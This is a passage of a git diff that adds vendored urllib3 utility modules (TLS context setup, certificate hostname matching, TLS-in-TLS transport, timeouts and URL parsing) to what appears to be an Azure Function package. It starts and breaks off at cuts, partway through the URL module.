OpenSSL options. These default to ``ssl.OP_NO_SSLv2``, + ``ssl.OP_NO_SSLv3``, ``ssl.OP_NO_COMPRESSION``, and ``ssl.OP_NO_TICKET``. + :param ciphers: + Which cipher suites to allow the server to select. 
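+
+    An illustrative call, assuming verification against the system trust
+    store is wanted (the ``ssl`` import is shown for clarity)::
+
+        import ssl
+        context = create_urllib3_context(cert_reqs=ssl.CERT_REQUIRED)
+        context.load_default_certs()
+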
+ :returns: + Constructed SSLContext object with specified options + :rtype: SSLContext + """ + # PROTOCOL_TLS is deprecated in Python 3.10 + if not ssl_version or ssl_version == PROTOCOL_TLS: + ssl_version = PROTOCOL_TLS_CLIENT + + context = SSLContext(ssl_version) + + context.set_ciphers(ciphers or DEFAULT_CIPHERS) + + # Setting the default here, as we may have no ssl module on import + cert_reqs = ssl.CERT_REQUIRED if cert_reqs is None else cert_reqs + + if options is None: + options = 0 + # SSLv2 is easily broken and is considered harmful and dangerous + options |= OP_NO_SSLv2 + # SSLv3 has several problems and is now dangerous + options |= OP_NO_SSLv3 + # Disable compression to prevent CRIME attacks for OpenSSL 1.0+ + # (issue #309) + options |= OP_NO_COMPRESSION + # TLSv1.2 only. Unless set explicitly, do not request tickets. + # This may save some bandwidth on wire, and although the ticket is encrypted, + # there is a risk associated with it being on wire, + # if the server is not rotating its ticketing keys properly. + options |= OP_NO_TICKET + + context.options |= options + + # Enable post-handshake authentication for TLS 1.3, see GH #1634. PHA is + # necessary for conditional client cert authentication with TLS 1.3. + # The attribute is None for OpenSSL <= 1.1.0 or does not exist in older + # versions of Python. We only enable on Python 3.7.4+ or if certificate + # verification is enabled to work around Python issue #37428 + # See: https://bugs.python.org/issue37428 + if (cert_reqs == ssl.CERT_REQUIRED or sys.version_info >= (3, 7, 4)) and getattr( + context, "post_handshake_auth", None + ) is not None: + context.post_handshake_auth = True + + def disable_check_hostname(): + if ( + getattr(context, "check_hostname", None) is not None + ): # Platform-specific: Python 3.2 + # We do our own verification, including fingerprints and alternative + # hostnames. So disable it here + context.check_hostname = False + + # The order of the below lines setting verify_mode and check_hostname + # matter due to safe-guards SSLContext has to prevent an SSLContext with + # check_hostname=True, verify_mode=NONE/OPTIONAL. This is made even more + # complex because we don't know whether PROTOCOL_TLS_CLIENT will be used + # or not so we don't know the initial state of the freshly created SSLContext. + if cert_reqs == ssl.CERT_REQUIRED: + context.verify_mode = cert_reqs + disable_check_hostname() + else: + disable_check_hostname() + context.verify_mode = cert_reqs + + # Enable logging of TLS session keys via defacto standard environment variable + # 'SSLKEYLOGFILE', if the feature is available (Python 3.8+). Skip empty values. + if hasattr(context, "keylog_filename"): + sslkeylogfile = os.environ.get("SSLKEYLOGFILE") + if sslkeylogfile: + context.keylog_filename = sslkeylogfile + + return context + + +def ssl_wrap_socket( + sock, + keyfile=None, + certfile=None, + cert_reqs=None, + ca_certs=None, + server_hostname=None, + ssl_version=None, + ciphers=None, + ssl_context=None, + ca_cert_dir=None, + key_password=None, + ca_cert_data=None, + tls_in_tls=False, +): + """ + All arguments except for server_hostname, ssl_context, and ca_cert_dir have + the same meaning as they do when using :func:`ssl.wrap_socket`. + + :param server_hostname: + When SNI is supported, the expected hostname of the certificate + :param ssl_context: + A pre-made :class:`SSLContext` object. If none is provided, one will + be created using :func:`create_urllib3_context`. 
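+
+        A minimal usage sketch (``sock`` is a placeholder for an
+        already-connected socket; the hostname is illustrative)::
+
+            ctx = create_urllib3_context()
+            tls_sock = ssl_wrap_socket(
+                sock, ssl_context=ctx, server_hostname="example.com"
+            )
+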
+ :param ciphers: + A string of ciphers we wish the client to support. + :param ca_cert_dir: + A directory containing CA certificates in multiple separate files, as + supported by OpenSSL's -CApath flag or the capath argument to + SSLContext.load_verify_locations(). + :param key_password: + Optional password if the keyfile is encrypted. + :param ca_cert_data: + Optional string containing CA certificates in PEM format suitable for + passing as the cadata parameter to SSLContext.load_verify_locations() + :param tls_in_tls: + Use SSLTransport to wrap the existing socket. + """ + context = ssl_context + if context is None: + # Note: This branch of code and all the variables in it are no longer + # used by urllib3 itself. We should consider deprecating and removing + # this code. + context = create_urllib3_context(ssl_version, cert_reqs, ciphers=ciphers) + + if ca_certs or ca_cert_dir or ca_cert_data: + try: + context.load_verify_locations(ca_certs, ca_cert_dir, ca_cert_data) + except (IOError, OSError) as e: + raise SSLError(e) + + elif ssl_context is None and hasattr(context, "load_default_certs"): + # try to load OS default certs; works well on Windows (require Python3.4+) + context.load_default_certs() + + # Attempt to detect if we get the goofy behavior of the + # keyfile being encrypted and OpenSSL asking for the + # passphrase via the terminal and instead error out. + if keyfile and key_password is None and _is_key_file_encrypted(keyfile): + raise SSLError("Client private key is encrypted, password is required") + + if certfile: + if key_password is None: + context.load_cert_chain(certfile, keyfile) + else: + context.load_cert_chain(certfile, keyfile, key_password) + + try: + if hasattr(context, "set_alpn_protocols"): + context.set_alpn_protocols(ALPN_PROTOCOLS) + except NotImplementedError: # Defensive: in CI, we always have set_alpn_protocols + pass + + # If we detect server_hostname is an IP address then the SNI + # extension should not be used according to RFC3546 Section 3.1 + use_sni_hostname = server_hostname and not is_ipaddress(server_hostname) + # SecureTransport uses server_hostname in certificate verification. + send_sni = (use_sni_hostname and HAS_SNI) or ( + IS_SECURETRANSPORT and server_hostname + ) + # Do not warn the user if server_hostname is an invalid SNI hostname. + if not HAS_SNI and use_sni_hostname: + warnings.warn( + "An HTTPS request has been made, but the SNI (Server Name " + "Indication) extension to TLS is not available on this platform. " + "This may cause the server to present an incorrect TLS " + "certificate, which can cause validation failures. You can upgrade to " + "a newer version of Python to solve this. For more information, see " + "https://urllib3.readthedocs.io/en/1.26.x/advanced-usage.html" + "#ssl-warnings", + SNIMissingWarning, + ) + + if send_sni: + ssl_sock = _ssl_wrap_socket_impl( + sock, context, tls_in_tls, server_hostname=server_hostname + ) + else: + ssl_sock = _ssl_wrap_socket_impl(sock, context, tls_in_tls) + return ssl_sock + + +def is_ipaddress(hostname): + """Detects whether the hostname given is an IPv4 or IPv6 address. + Also detects IPv6 addresses with Zone IDs. + + :param str hostname: Hostname to examine. + :return: True if the hostname is an IP address, False otherwise. + """ + if not six.PY2 and isinstance(hostname, bytes): + # IDN A-label bytes are ASCII compatible. 
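+        # Illustrative results (the inputs are examples, not urllib3's):
+        #   is_ipaddress("10.0.0.1")      -> True
+        #   is_ipaddress("fe80::1%eth0")  -> True   (zone ID, no brackets)
+        #   is_ipaddress("example.com")   -> False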
+ hostname = hostname.decode("ascii") + return bool(IPV4_RE.match(hostname) or BRACELESS_IPV6_ADDRZ_RE.match(hostname)) + + +def _is_key_file_encrypted(key_file): + """Detects if a key file is encrypted or not.""" + with open(key_file, "r") as f: + for line in f: + # Look for Proc-Type: 4,ENCRYPTED + if "ENCRYPTED" in line: + return True + + return False + + +def _ssl_wrap_socket_impl(sock, ssl_context, tls_in_tls, server_hostname=None): + if tls_in_tls: + if not SSLTransport: + # Import error, ssl is not available. + raise ProxySchemeUnsupported( + "TLS in TLS requires support for the 'ssl' module" + ) + + SSLTransport._validate_ssl_context_for_tls_in_tls(ssl_context) + return SSLTransport(sock, ssl_context, server_hostname) + + if server_hostname: + return ssl_context.wrap_socket(sock, server_hostname=server_hostname) + else: + return ssl_context.wrap_socket(sock) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/util/ssl_match_hostname.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/util/ssl_match_hostname.py new file mode 100644 index 0000000..d703a87 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/util/ssl_match_hostname.py @@ -0,0 +1,159 @@ +"""The match_hostname() function from Python 3.3.3, essential when using SSL.""" + +# Note: This file is under the PSF license as the code comes from the python +# stdlib. http://docs.python.org/3/license.html + +import re +import sys + +# ipaddress has been backported to 2.6+ in pypi. If it is installed on the +# system, use it to handle IPAddress ServerAltnames (this was added in +# python-3.5) otherwise only do DNS matching. This allows +# util.ssl_match_hostname to continue to be used in Python 2.7. +try: + import ipaddress +except ImportError: + ipaddress = None + +__version__ = "3.5.0.1" + + +class CertificateError(ValueError): + pass + + +def _dnsname_match(dn, hostname, max_wildcards=1): + """Matching according to RFC 6125, section 6.4.3 + + http://tools.ietf.org/html/rfc6125#section-6.4.3 + """ + pats = [] + if not dn: + return False + + # Ported from python3-syntax: + # leftmost, *remainder = dn.split(r'.') + parts = dn.split(r".") + leftmost = parts[0] + remainder = parts[1:] + + wildcards = leftmost.count("*") + if wildcards > max_wildcards: + # Issue #17980: avoid denials of service by refusing more + # than one wildcard per fragment. A survey of established + # policy among SSL implementations showed it to be a + # reasonable choice. + raise CertificateError( + "too many wildcards in certificate DNS name: " + repr(dn) + ) + + # speed up common case w/o wildcards + if not wildcards: + return dn.lower() == hostname.lower() + + # RFC 6125, section 6.4.3, subitem 1. + # The client SHOULD NOT attempt to match a presented identifier in which + # the wildcard character comprises a label other than the left-most label. + if leftmost == "*": + # When '*' is a fragment by itself, it matches a non-empty dotless + # fragment. + pats.append("[^.]+") + elif leftmost.startswith("xn--") or hostname.startswith("xn--"): + # RFC 6125, section 6.4.3, subitem 3. + # The client SHOULD NOT attempt to match a presented identifier + # where the wildcard character is embedded within an A-label or + # U-label of an internationalized domain name. + pats.append(re.escape(leftmost)) + else: + # Otherwise, '*' matches any dotless string, e.g. 
www* + pats.append(re.escape(leftmost).replace(r"\*", "[^.]*")) + + # add the remaining fragments, ignore any wildcards + for frag in remainder: + pats.append(re.escape(frag)) + + pat = re.compile(r"\A" + r"\.".join(pats) + r"\Z", re.IGNORECASE) + return pat.match(hostname) + + +def _to_unicode(obj): + if isinstance(obj, str) and sys.version_info < (3,): + # ignored flake8 # F821 to support python 2.7 function + obj = unicode(obj, encoding="ascii", errors="strict") # noqa: F821 + return obj + + +def _ipaddress_match(ipname, host_ip): + """Exact matching of IP addresses. + + RFC 6125 explicitly doesn't define an algorithm for this + (section 1.7.2 - "Out of Scope"). + """ + # OpenSSL may add a trailing newline to a subjectAltName's IP address + # Divergence from upstream: ipaddress can't handle byte str + ip = ipaddress.ip_address(_to_unicode(ipname).rstrip()) + return ip == host_ip + + +def match_hostname(cert, hostname): + """Verify that *cert* (in decoded format as returned by + SSLSocket.getpeercert()) matches the *hostname*. RFC 2818 and RFC 6125 + rules are followed, but IP addresses are not accepted for *hostname*. + + CertificateError is raised on failure. On success, the function + returns nothing. + """ + if not cert: + raise ValueError( + "empty or no certificate, match_hostname needs a " + "SSL socket or SSL context with either " + "CERT_OPTIONAL or CERT_REQUIRED" + ) + try: + # Divergence from upstream: ipaddress can't handle byte str + host_ip = ipaddress.ip_address(_to_unicode(hostname)) + except (UnicodeError, ValueError): + # ValueError: Not an IP address (common case) + # UnicodeError: Divergence from upstream: Have to deal with ipaddress not taking + # byte strings. addresses should be all ascii, so we consider it not + # an ipaddress in this case + host_ip = None + except AttributeError: + # Divergence from upstream: Make ipaddress library optional + if ipaddress is None: + host_ip = None + else: # Defensive + raise + dnsnames = [] + san = cert.get("subjectAltName", ()) + for key, value in san: + if key == "DNS": + if host_ip is None and _dnsname_match(value, hostname): + return + dnsnames.append(value) + elif key == "IP Address": + if host_ip is not None and _ipaddress_match(value, host_ip): + return + dnsnames.append(value) + if not dnsnames: + # The subject is only checked when there is no dNSName entry + # in subjectAltName + for sub in cert.get("subject", ()): + for key, value in sub: + # XXX according to RFC 2818, the most specific Common Name + # must be used. 
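+                # Wildcard semantics enforced by _dnsname_match (illustrative):
+                #   "*.example.com" matches "www.example.com",
+                #   but not "example.com" (the wildcard label must be present)
+                #   and not "a.b.example.com" ("*" spans a single label only).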
+ if key == "commonName": + if _dnsname_match(value, hostname): + return + dnsnames.append(value) + if len(dnsnames) > 1: + raise CertificateError( + "hostname %r " + "doesn't match either of %s" % (hostname, ", ".join(map(repr, dnsnames))) + ) + elif len(dnsnames) == 1: + raise CertificateError("hostname %r doesn't match %r" % (hostname, dnsnames[0])) + else: + raise CertificateError( + "no appropriate commonName or subjectAltName fields were found" + ) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/util/ssltransport.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/util/ssltransport.py new file mode 100644 index 0000000..51e7be6 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/util/ssltransport.py @@ -0,0 +1,221 @@ +import io +import socket +import ssl + +from ..exceptions import ProxySchemeUnsupported +from ..packages import six + +SSL_BLOCKSIZE = 16384 + + +class SSLTransport: + """ + The SSLTransport wraps an existing socket and establishes an SSL connection. + + Contrary to Python's implementation of SSLSocket, it allows you to chain + multiple TLS connections together. It's particularly useful if you need to + implement TLS within TLS. + + The class supports most of the socket API operations. + """ + + @staticmethod + def _validate_ssl_context_for_tls_in_tls(ssl_context): + """ + Raises a ProxySchemeUnsupported if the provided ssl_context can't be used + for TLS in TLS. + + The only requirement is that the ssl_context provides the 'wrap_bio' + methods. + """ + + if not hasattr(ssl_context, "wrap_bio"): + if six.PY2: + raise ProxySchemeUnsupported( + "TLS in TLS requires SSLContext.wrap_bio() which isn't " + "supported on Python 2" + ) + else: + raise ProxySchemeUnsupported( + "TLS in TLS requires SSLContext.wrap_bio() which isn't " + "available on non-native SSLContext" + ) + + def __init__( + self, socket, ssl_context, server_hostname=None, suppress_ragged_eofs=True + ): + """ + Create an SSLTransport around socket using the provided ssl_context. + """ + self.incoming = ssl.MemoryBIO() + self.outgoing = ssl.MemoryBIO() + + self.suppress_ragged_eofs = suppress_ragged_eofs + self.socket = socket + + self.sslobj = ssl_context.wrap_bio( + self.incoming, self.outgoing, server_hostname=server_hostname + ) + + # Perform initial handshake. 
+ self._ssl_io_loop(self.sslobj.do_handshake) + + def __enter__(self): + return self + + def __exit__(self, *_): + self.close() + + def fileno(self): + return self.socket.fileno() + + def read(self, len=1024, buffer=None): + return self._wrap_ssl_read(len, buffer) + + def recv(self, len=1024, flags=0): + if flags != 0: + raise ValueError("non-zero flags not allowed in calls to recv") + return self._wrap_ssl_read(len) + + def recv_into(self, buffer, nbytes=None, flags=0): + if flags != 0: + raise ValueError("non-zero flags not allowed in calls to recv_into") + if buffer and (nbytes is None): + nbytes = len(buffer) + elif nbytes is None: + nbytes = 1024 + return self.read(nbytes, buffer) + + def sendall(self, data, flags=0): + if flags != 0: + raise ValueError("non-zero flags not allowed in calls to sendall") + count = 0 + with memoryview(data) as view, view.cast("B") as byte_view: + amount = len(byte_view) + while count < amount: + v = self.send(byte_view[count:]) + count += v + + def send(self, data, flags=0): + if flags != 0: + raise ValueError("non-zero flags not allowed in calls to send") + response = self._ssl_io_loop(self.sslobj.write, data) + return response + + def makefile( + self, mode="r", buffering=None, encoding=None, errors=None, newline=None + ): + """ + Python's httpclient uses makefile and buffered io when reading HTTP + messages and we need to support it. + + This is unfortunately a copy and paste of socket.py makefile with small + changes to point to the socket directly. + """ + if not set(mode) <= {"r", "w", "b"}: + raise ValueError("invalid mode %r (only r, w, b allowed)" % (mode,)) + + writing = "w" in mode + reading = "r" in mode or not writing + assert reading or writing + binary = "b" in mode + rawmode = "" + if reading: + rawmode += "r" + if writing: + rawmode += "w" + raw = socket.SocketIO(self, rawmode) + self.socket._io_refs += 1 + if buffering is None: + buffering = -1 + if buffering < 0: + buffering = io.DEFAULT_BUFFER_SIZE + if buffering == 0: + if not binary: + raise ValueError("unbuffered streams must be binary") + return raw + if reading and writing: + buffer = io.BufferedRWPair(raw, raw, buffering) + elif reading: + buffer = io.BufferedReader(raw, buffering) + else: + assert writing + buffer = io.BufferedWriter(raw, buffering) + if binary: + return buffer + text = io.TextIOWrapper(buffer, encoding, errors, newline) + text.mode = mode + return text + + def unwrap(self): + self._ssl_io_loop(self.sslobj.unwrap) + + def close(self): + self.socket.close() + + def getpeercert(self, binary_form=False): + return self.sslobj.getpeercert(binary_form) + + def version(self): + return self.sslobj.version() + + def cipher(self): + return self.sslobj.cipher() + + def selected_alpn_protocol(self): + return self.sslobj.selected_alpn_protocol() + + def selected_npn_protocol(self): + return self.sslobj.selected_npn_protocol() + + def shared_ciphers(self): + return self.sslobj.shared_ciphers() + + def compression(self): + return self.sslobj.compression() + + def settimeout(self, value): + self.socket.settimeout(value) + + def gettimeout(self): + return self.socket.gettimeout() + + def _decref_socketios(self): + self.socket._decref_socketios() + + def _wrap_ssl_read(self, len, buffer=None): + try: + return self._ssl_io_loop(self.sslobj.read, len, buffer) + except ssl.SSLError as e: + if e.errno == ssl.SSL_ERROR_EOF and self.suppress_ragged_eofs: + return 0 # eof, return 0. 
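+                # A "ragged" EOF is the peer closing the TCP connection
+                # without sending a TLS close_notify alert; returning 0 here
+                # mirrors plain-socket EOF semantics, which is what buffered
+                # readers built on this transport expect.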
+ else: + raise + + def _ssl_io_loop(self, func, *args): + """Performs an I/O loop between incoming/outgoing and the socket.""" + should_loop = True + ret = None + + while should_loop: + errno = None + try: + ret = func(*args) + except ssl.SSLError as e: + if e.errno not in (ssl.SSL_ERROR_WANT_READ, ssl.SSL_ERROR_WANT_WRITE): + # WANT_READ, and WANT_WRITE are expected, others are not. + raise e + errno = e.errno + + buf = self.outgoing.read() + self.socket.sendall(buf) + + if errno is None: + should_loop = False + elif errno == ssl.SSL_ERROR_WANT_READ: + buf = self.socket.recv(SSL_BLOCKSIZE) + if buf: + self.incoming.write(buf) + else: + self.incoming.write_eof() + return ret diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/util/timeout.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/util/timeout.py new file mode 100644 index 0000000..77a160e --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/util/timeout.py @@ -0,0 +1,268 @@ +from __future__ import absolute_import + +import time + +# The default socket timeout, used by httplib to indicate that no timeout was +# specified by the user +from socket import _GLOBAL_DEFAULT_TIMEOUT + +from ..exceptions import TimeoutStateError + +# A sentinel value to indicate that no timeout was specified by the user in +# urllib3 +_Default = object() + + +# Use time.monotonic if available. +current_time = getattr(time, "monotonic", time.time) + + +class Timeout(object): + """Timeout configuration. + + Timeouts can be defined as a default for a pool: + + .. code-block:: python + + timeout = Timeout(connect=2.0, read=7.0) + http = PoolManager(timeout=timeout) + response = http.request('GET', 'http://example.com/') + + Or per-request (which overrides the default for the pool): + + .. code-block:: python + + response = http.request('GET', 'http://example.com/', timeout=Timeout(10)) + + Timeouts can be disabled by setting all the parameters to ``None``: + + .. code-block:: python + + no_timeout = Timeout(connect=None, read=None) + response = http.request('GET', 'http://example.com/, timeout=no_timeout) + + + :param total: + This combines the connect and read timeouts into one; the read timeout + will be set to the time leftover from the connect attempt. In the + event that both a connect timeout and a total are specified, or a read + timeout and a total are specified, the shorter timeout will be applied. + + Defaults to None. + + :type total: int, float, or None + + :param connect: + The maximum amount of time (in seconds) to wait for a connection + attempt to a server to succeed. Omitting the parameter will default the + connect timeout to the system default, probably `the global default + timeout in socket.py + `_. + None will set an infinite timeout for connection attempts. + + :type connect: int, float, or None + + :param read: + The maximum amount of time (in seconds) to wait between consecutive + read operations for a response from the server. Omitting the parameter + will default the read timeout to the system default, probably `the + global default timeout in socket.py + `_. + None will set an infinite timeout. + + :type read: int, float, or None + + .. note:: + + Many factors can affect the total amount of time for urllib3 to return + an HTTP response. + + For example, Python's DNS resolver does not obey the timeout specified + on the socket. 
Other factors that can affect total request time include + high CPU load, high swap, the program running at a low priority level, + or other behaviors. + + In addition, the read and total timeouts only measure the time between + read operations on the socket connecting the client and the server, + not the total amount of time for the request to return a complete + response. For most requests, the timeout is raised because the server + has not sent the first byte in the specified time. This is not always + the case; if a server streams one byte every fifteen seconds, a timeout + of 20 seconds will not trigger, even though the request will take + several minutes to complete. + + If your goal is to cut off any request after a set amount of wall clock + time, consider having a second "watcher" thread to cut off a slow + request. + """ + + #: A sentinel object representing the default timeout value + DEFAULT_TIMEOUT = _GLOBAL_DEFAULT_TIMEOUT + + def __init__(self, total=None, connect=_Default, read=_Default): + self._connect = self._validate_timeout(connect, "connect") + self._read = self._validate_timeout(read, "read") + self.total = self._validate_timeout(total, "total") + self._start_connect = None + + def __repr__(self): + return "%s(connect=%r, read=%r, total=%r)" % ( + type(self).__name__, + self._connect, + self._read, + self.total, + ) + + # __str__ provided for backwards compatibility + __str__ = __repr__ + + @classmethod + def _validate_timeout(cls, value, name): + """Check that a timeout attribute is valid. + + :param value: The timeout value to validate + :param name: The name of the timeout attribute to validate. This is + used to specify in error messages. + :return: The validated and casted version of the given value. + :raises ValueError: If it is a numeric value less than or equal to + zero, or the type is not an integer, float, or None. + """ + if value is _Default: + return cls.DEFAULT_TIMEOUT + + if value is None or value is cls.DEFAULT_TIMEOUT: + return value + + if isinstance(value, bool): + raise ValueError( + "Timeout cannot be a boolean value. It must " + "be an int, float or None." + ) + try: + float(value) + except (TypeError, ValueError): + raise ValueError( + "Timeout value %s was %s, but it must be an " + "int, float or None." % (name, value) + ) + + try: + if value <= 0: + raise ValueError( + "Attempted to set %s timeout to %s, but the " + "timeout cannot be set to a value less " + "than or equal to 0." % (name, value) + ) + except TypeError: + # Python 3 + raise ValueError( + "Timeout value %s was %s, but it must be an " + "int, float or None." % (name, value) + ) + + return value + + @classmethod + def from_float(cls, timeout): + """Create a new Timeout from a legacy timeout value. + + The timeout value used by httplib.py sets the same timeout on the + connect(), and recv() socket requests. This creates a :class:`Timeout` + object that sets the individual timeouts to the ``timeout`` value + passed to this function. + + :param timeout: The legacy timeout value. + :type timeout: integer, float, sentinel default object, or None + :return: Timeout object + :rtype: :class:`Timeout` + """ + return Timeout(read=timeout, connect=timeout) + + def clone(self): + """Create a copy of the timeout object + + Timeout properties are stored per-pool but each request needs a fresh + Timeout object to ensure each one has its own start/stop configured. 
+ + :return: a copy of the timeout object + :rtype: :class:`Timeout` + """ + # We can't use copy.deepcopy because that will also create a new object + # for _GLOBAL_DEFAULT_TIMEOUT, which socket.py uses as a sentinel to + # detect the user default. + return Timeout(connect=self._connect, read=self._read, total=self.total) + + def start_connect(self): + """Start the timeout clock, used during a connect() attempt + + :raises urllib3.exceptions.TimeoutStateError: if you attempt + to start a timer that has been started already. + """ + if self._start_connect is not None: + raise TimeoutStateError("Timeout timer has already been started.") + self._start_connect = current_time() + return self._start_connect + + def get_connect_duration(self): + """Gets the time elapsed since the call to :meth:`start_connect`. + + :return: Elapsed time in seconds. + :rtype: float + :raises urllib3.exceptions.TimeoutStateError: if you attempt + to get duration for a timer that hasn't been started. + """ + if self._start_connect is None: + raise TimeoutStateError( + "Can't get connect duration for timer that has not started." + ) + return current_time() - self._start_connect + + @property + def connect_timeout(self): + """Get the value to use when setting a connection timeout. + + This will be a positive float or integer, the value None + (never timeout), or the default system timeout. + + :return: Connect timeout. + :rtype: int, float, :attr:`Timeout.DEFAULT_TIMEOUT` or None + """ + if self.total is None: + return self._connect + + if self._connect is None or self._connect is self.DEFAULT_TIMEOUT: + return self.total + + return min(self._connect, self.total) + + @property + def read_timeout(self): + """Get the value for the read timeout. + + This assumes some time has elapsed in the connection timeout and + computes the read timeout appropriately. + + If self.total is set, the read timeout is dependent on the amount of + time taken by the connect timeout. If the connection time has not been + established, a :exc:`~urllib3.exceptions.TimeoutStateError` will be + raised. + + :return: Value to use for the read timeout. + :rtype: int, float, :attr:`Timeout.DEFAULT_TIMEOUT` or None + :raises urllib3.exceptions.TimeoutStateError: If :meth:`start_connect` + has not yet been called on this object. + """ + if ( + self.total is not None + and self.total is not self.DEFAULT_TIMEOUT + and self._read is not None + and self._read is not self.DEFAULT_TIMEOUT + ): + # In case the connect timeout has not yet been established. + if self._start_connect is None: + return self._read + return max(0, min(self.total - self.get_connect_duration(), self._read)) + elif self.total is not None and self.total is not self.DEFAULT_TIMEOUT: + return max(0, self.total - self.get_connect_duration()) + else: + return self._read diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/util/url.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/util/url.py new file mode 100644 index 0000000..dc03d45 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/util/url.py @@ -0,0 +1,432 @@ +from __future__ import absolute_import + +import re +from collections import namedtuple + +from ..exceptions import LocationParseError +from ..packages import six + +url_attrs = ["scheme", "auth", "host", "port", "path", "query", "fragment"] + +# We only want to normalize urls with an HTTP(S) scheme. 
+# urllib3 infers URLs without a scheme (None) to be http. +NORMALIZABLE_SCHEMES = ("http", "https", None) + +# Almost all of these patterns were derived from the +# 'rfc3986' module: https://github.com/python-hyper/rfc3986 +PERCENT_RE = re.compile(r"%[a-fA-F0-9]{2}") +SCHEME_RE = re.compile(r"^(?:[a-zA-Z][a-zA-Z0-9+-]*:|/)") +URI_RE = re.compile( + r"^(?:([a-zA-Z][a-zA-Z0-9+.-]*):)?" + r"(?://([^\\/?#]*))?" + r"([^?#]*)" + r"(?:\?([^#]*))?" + r"(?:#(.*))?$", + re.UNICODE | re.DOTALL, +) + +IPV4_PAT = r"(?:[0-9]{1,3}\.){3}[0-9]{1,3}" +HEX_PAT = "[0-9A-Fa-f]{1,4}" +LS32_PAT = "(?:{hex}:{hex}|{ipv4})".format(hex=HEX_PAT, ipv4=IPV4_PAT) +_subs = {"hex": HEX_PAT, "ls32": LS32_PAT} +_variations = [ + # 6( h16 ":" ) ls32 + "(?:%(hex)s:){6}%(ls32)s", + # "::" 5( h16 ":" ) ls32 + "::(?:%(hex)s:){5}%(ls32)s", + # [ h16 ] "::" 4( h16 ":" ) ls32 + "(?:%(hex)s)?::(?:%(hex)s:){4}%(ls32)s", + # [ *1( h16 ":" ) h16 ] "::" 3( h16 ":" ) ls32 + "(?:(?:%(hex)s:)?%(hex)s)?::(?:%(hex)s:){3}%(ls32)s", + # [ *2( h16 ":" ) h16 ] "::" 2( h16 ":" ) ls32 + "(?:(?:%(hex)s:){0,2}%(hex)s)?::(?:%(hex)s:){2}%(ls32)s", + # [ *3( h16 ":" ) h16 ] "::" h16 ":" ls32 + "(?:(?:%(hex)s:){0,3}%(hex)s)?::%(hex)s:%(ls32)s", + # [ *4( h16 ":" ) h16 ] "::" ls32 + "(?:(?:%(hex)s:){0,4}%(hex)s)?::%(ls32)s", + # [ *5( h16 ":" ) h16 ] "::" h16 + "(?:(?:%(hex)s:){0,5}%(hex)s)?::%(hex)s", + # [ *6( h16 ":" ) h16 ] "::" + "(?:(?:%(hex)s:){0,6}%(hex)s)?::", +] + +UNRESERVED_PAT = r"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789._!\-~" +IPV6_PAT = "(?:" + "|".join([x % _subs for x in _variations]) + ")" +ZONE_ID_PAT = "(?:%25|%)(?:[" + UNRESERVED_PAT + "]|%[a-fA-F0-9]{2})+" +IPV6_ADDRZ_PAT = r"\[" + IPV6_PAT + r"(?:" + ZONE_ID_PAT + r")?\]" +REG_NAME_PAT = r"(?:[^\[\]%:/?#]|%[a-fA-F0-9]{2})*" +TARGET_RE = re.compile(r"^(/[^?#]*)(?:\?([^#]*))?(?:#.*)?$") + +IPV4_RE = re.compile("^" + IPV4_PAT + "$") +IPV6_RE = re.compile("^" + IPV6_PAT + "$") +IPV6_ADDRZ_RE = re.compile("^" + IPV6_ADDRZ_PAT + "$") +BRACELESS_IPV6_ADDRZ_RE = re.compile("^" + IPV6_ADDRZ_PAT[2:-2] + "$") +ZONE_ID_RE = re.compile("(" + ZONE_ID_PAT + r")\]$") + +_HOST_PORT_PAT = ("^(%s|%s|%s)(?::([0-9]{0,5}))?$") % ( + REG_NAME_PAT, + IPV4_PAT, + IPV6_ADDRZ_PAT, +) +_HOST_PORT_RE = re.compile(_HOST_PORT_PAT, re.UNICODE | re.DOTALL) + +UNRESERVED_CHARS = set( + "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789._-~" +) +SUB_DELIM_CHARS = set("!$&'()*+,;=") +USERINFO_CHARS = UNRESERVED_CHARS | SUB_DELIM_CHARS | {":"} +PATH_CHARS = USERINFO_CHARS | {"@", "/"} +QUERY_CHARS = FRAGMENT_CHARS = PATH_CHARS | {"?"} + + +class Url(namedtuple("Url", url_attrs)): + """ + Data structure for representing an HTTP URL. Used as a return value for + :func:`parse_url`. Both the scheme and host are normalized as they are + both case-insensitive according to RFC 3986. + """ + + __slots__ = () + + def __new__( + cls, + scheme=None, + auth=None, + host=None, + port=None, + path=None, + query=None, + fragment=None, + ): + if path and not path.startswith("/"): + path = "/" + path + if scheme is not None: + scheme = scheme.lower() + return super(Url, cls).__new__( + cls, scheme, auth, host, port, path, query, fragment + ) + + @property + def hostname(self): + """For backwards-compatibility with urlparse. We're nice like that.""" + return self.host + + @property + def request_uri(self): + """Absolute path including the query string.""" + uri = self.path or "/" + + if self.query is not None: + uri += "?" 
+ self.query + + return uri + + @property + def netloc(self): + """Network location including host and port""" + if self.port: + return "%s:%d" % (self.host, self.port) + return self.host + + @property + def url(self): + """ + Convert self into a url + + This function should more or less round-trip with :func:`.parse_url`. The + returned url may not be exactly the same as the url inputted to + :func:`.parse_url`, but it should be equivalent by the RFC (e.g., urls + with a blank port will have : removed). + + Example: :: + + >>> U = parse_url('http://google.com/mail/') + >>> U.url + 'http://google.com/mail/' + >>> Url('http', 'username:password', 'host.com', 80, + ... '/path', 'query', 'fragment').url + 'http://username:password@host.com:80/path?query#fragment' + """ + scheme, auth, host, port, path, query, fragment = self + url = u"" + + # We use "is not None" we want things to happen with empty strings (or 0 port) + if scheme is not None: + url += scheme + u"://" + if auth is not None: + url += auth + u"@" + if host is not None: + url += host + if port is not None: + url += u":" + str(port) + if path is not 